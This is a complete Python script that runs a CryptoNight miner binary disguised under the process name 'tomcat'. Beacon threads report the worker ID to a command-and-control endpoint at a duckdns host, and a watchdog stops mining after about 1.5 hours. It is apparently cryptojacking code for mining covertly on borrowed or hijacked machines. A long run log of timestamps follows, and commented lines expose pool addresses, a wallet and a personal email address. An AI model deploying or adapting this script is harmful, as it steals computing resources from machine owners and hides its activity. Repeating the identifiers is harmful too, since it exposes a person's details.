import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:04.076508
#2018-02-17 16:13:07.694482
#2018-02-17 18:02:04.044517
#2018-02-17 19:49:04.556701
#2018-02-17 21:36:06.307314
#2018-02-17 23:20:09.012372
#2018-02-18 01:08:06.265895
#2018-02-18 02:56:05.592283
#2018-02-18 04:44:01.448867
#2018-02-18 06:36:04.011912
#2018-02-18 08:24:03.717114
#2018-02-18 10:12:06.270968
#2018-02-18 11:58:04.959177
#2018-02-18 13:43:06.988650
#2018-02-18 15:36:03.741553
#2018-02-18 17:24:01.553854
#2018-02-18 19:13:01.407595
#2018-02-18 20:59:06.240810
#2018-02-18 22:46:07.114738
#2018-02-19 00:35:04.007592
#2018-02-19 02:21:04.639607
#2018-02-19 04:07:07.563021
#2018-02-19 05:51:07.040238
#2018-02-19 07:39:04.052974
#2018-02-19 09:28:06.732954
#2018-02-19 11:17:01.407981
#2018-02-19 13:04:08.026573
#2018-02-19 14:52:10.222928
#2018-02-19 16:41:04.881478
#2018-02-19 18:28:02.999984
#2018-02-19 20:13:07.519488
#2018-02-19 22:04:05.154239
#2018-02-19 23:51:08.656250
#2018-02-20 01:38:02.140290
#2018-02-20 03:26:07.706310
#2018-02-20 05:14:05.540572
#2018-02-20 06:56:07.494877
#2018-02-20 08:43:04.252585
#2018-02-20 10:27:08.647566
#2018-02-20 12:12:04.044784
#2018-02-20 14:01:07.246516
#2018-02-20 15:44:01.431736
#2018-02-20 17:31:07.534494
#2018-02-20 19:20:11.812987
#2018-02-20 21:08:01.987600
#2018-02-20 22:53:02.055091
#2018-02-21 00:35:07.090311
#2018-02-21 02:21:07.074605
#2018-02-21 04:07:06.268027
#2018-02-21 05:54:06.634182
#2018-02-21 07:42:02.089153
#2018-02-21 09:26:07.709174
#2018-02-21 11:15:01.841780
#2018-02-21 13:02:06.712805
#2018-02-21 14:50:13.112842
#2018-02-21 16:37:09.569255
#2018-02-21 18:26:01.286793
#2018-02-21 20:11:06.698305
#2018-02-21 21:57:07.023252
#2018-02-21 23:44:05.948961
#2018-02-22 01:34:08.303525
#2018-02-22 03:22:03.915418
#2018-02-22 05:09:06.548790
#2018-02-22 06:53:06.000876
#2018-02-22 08:39:05.468452
#2018-02-22 10:27:01.609135
#2018-02-22 12:12:01.349222
#2018-02-22 13:57:05.633328
#2018-02-22 15:44:07.131283
#2018-02-22 17:31:01.454498
#2018-02-22 19:20:07.832947
#2018-02-22 21:11:05.658585
#2018-02-22 22:55:04.091653
#2018-02-23 00:41:07.529273
#2018-02-23 02:29:06.911202
#2018-02-23 04:19:04.932503
#2018-02-23 06:07:01.356793
#2018-02-23 07:52:07.336121
#2018-02-23 10:09:01.534706
#2018-02-23 12:02:08.323780
#2018-02-23 13:50:09.540691
#2018-02-23 15:40:02.004872
#2018-02-23 17:27:04.880873
#2018-02-23 19:13:01.364953
#2018-02-23 20:57:04.046383
#2018-02-23 22:44:05.577258
#2018-02-24 00:33:05.781193
#2018-02-24 02:24:04.939309
#2018-02-24 04:13:03.663922
#2018-02-24 06:01:04.165051
#2018-02-24 07:48:06.175013
#2018-02-24 09:33:05.917924
#2018-02-24 11:27:04.999760
#2018-02-24 13:16:04.075289
#2018-02-24 15:07:03.899453
#2018-02-24 16:56:03.950688
#2018-02-24 18:44:01.687892
#2018-02-24 20:34:04.921522
#2018-02-24 22:36:06.385180
#2018-02-25 01:43:06.843331
#2018-02-25 05:14:05.067250
#2018-02-25 11:10:02.135323